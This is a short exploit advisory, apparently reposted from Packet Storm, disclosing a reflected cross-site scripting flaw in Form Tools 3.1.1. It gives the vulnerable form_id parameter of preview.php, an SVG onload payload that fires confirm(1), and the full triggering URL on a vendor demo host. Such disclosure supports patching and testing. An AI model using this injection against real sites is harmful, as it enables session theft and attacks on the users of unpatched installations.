Form Tools 3.1.1 Cross Site Scripting
2024-1-8 22:50:16 Author: packetstormsecurity.com(查看原文) 阅读量:8 收藏

# Exploit Title: Form Tools Version: 3.1.1 -  Reflected XSS 
# Date: 2024-6-1
# Exploit Author: tmrswrr
# Vendor Homepage: https://formtools.org/
# Version: 3.1.1
# Tested on: https://www.softaculous.com/demos/Form_Tools

1 ) Write after form_id your payload : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2
Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will bee alert button : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//


文章来源: https://packetstormsecurity.com/files/176403/formtools311-xss.txt
如有侵权请联系:admin#unsafe.sh